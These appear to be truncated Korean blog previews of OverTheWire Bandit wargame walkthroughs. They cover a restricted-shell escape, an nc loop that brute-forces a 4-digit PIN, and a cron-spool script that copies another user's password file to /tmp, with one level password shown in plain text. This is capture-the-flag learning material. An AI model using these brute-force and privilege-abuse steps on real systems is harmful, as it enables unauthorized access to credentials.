Level Goal다음 레벨로 넘어가는데 필요한 패스워드를 얻기 위해서 다음 레벨로 접속은 SSH 키 값을 이용해서 할 수 있지만, bandit26 유저의 shell은 /bin/bash가 아니기 때문에 정상적으로 동작을 할 수가 없다. bandit26 유저의 shell을 확인해보면 /usr/bin/showtext로 되어있는 것을 확인할 수 있고, 내용을 살펴보면 more 명령어를 이용하여 ~/text.txt 파일을 읽고 종료하는 것을 볼 수 있다.$ cat /etc/passwd | grep bandit26$ cat /usr/bin/showtext bandit26.sshkey 파일을 이용해서 다음 레벨로 접속 시도 $ ssh -i bandit26.sshkey bandit26@localhost 터미널 창의 ..
Level Goal다음 레벨로 넘어가는데 필요한 패스워드는 30002 포트로 접속해서 4-digit pincode를 맞게 입력하면 확인할 수 있다. brute-forcing...$ mkdir -p /tmp/do9dark/$ cd /tmp/do9dark/$ cat > brute_forcing.sh#!/bin/bashpasswd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ" for pincode in {0..9}{0..9}{0..9}{0..9}do echo $passwd' '$pincode | nc localhost 30002 >> result & done(Ctrl+D)$ chmod 777 brute_forcing.sh$ ./brute_forcing.sh $ ls -al$ sort resul..
Level Goal다음 레벨로 넘어가는데 필요한 패스워드는 /etc/cron.d/에서 정보를 획득해서 확인할 수 있다. $ cd /etc/cron.d/$ cat cronjob_bandit24$ cat /usr/bin/cronjob_bandit24.sh cronjob_bandit24.sh을 보면 /var/spool/bandit24에 있는 스크립트를 실행하고 제거하는 것을 알 수 있고 이를 이용해서 다음 레벨의 패스워드를 획득할 수 있다.$ mkdir -p /tmp/do9dark/$ cd /tmp/do9dark/$ cat > dump.sh#!/bin/bashcat /etc/bandit_pass/bandit24 > /tmp/do9dark/bandit_pass(Ctrl+D)$ chmod 777 dump.sh$ ..